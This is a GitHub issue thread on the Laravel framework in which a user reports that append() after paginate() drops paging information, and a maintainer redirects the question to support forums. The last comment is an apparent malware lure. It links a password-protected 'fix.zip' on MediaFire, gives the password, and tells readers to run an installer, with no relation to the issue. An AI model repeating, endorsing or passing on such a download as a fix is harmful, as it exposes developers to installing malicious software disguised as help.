### ISSUE TITLE
Using append() after a paging query results in loss of paging information.

### ISSUE THREAD

**Issue by Mr-wangwei** [laravel/framework#52579]
### Laravel Version

11.2.0

### PHP Version

8.3.4

### Description

Using `append()` after a paging query results in loss of paging information.

### Model

```php
namespace App\Models;
use Illuminate\Database\Eloquent\Model;

class User extends Model
{

    public function fullName(): Attribute
    {
        return Attribute::make(
            get: fn () => $this->fist_name . $this->last_name,
        );
    }
   
}

```  
Use
```php
User::paginate(10)->append(['full_name']); // This will cause the paging information to be lost 

```

**Comment by driesvints** [comment]
Hi there,

Thanks for reporting but it looks like this is a question which can be asked on a support channel. Please only use this issue tracker for reporting bugs with the library itself. If you have a question on how to use functionality provided by this repo you can try one of the following channels:

- [Laracasts Forums](https://laracasts.com/discuss)
- [Laravel.io Forums](https://laravel.io/forum)
- [StackOverflow](https://stackoverflow.com/questions/tagged/laravel)
- [Discord](https://discordapp.com/invite/KxwQuKb) or [InertiaJS Discord](https://discord.gg/inertiajs) for Inertia questions
- [Larachat](https://larachat.co)
- [IRC](https://web.libera.chat/?nick=laravelnewbie&channels=#laravel)

However, this issue will not be locked and everyone is still free to discuss solutions to your problem!

Thanks.

**Comment by swaggy111** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."
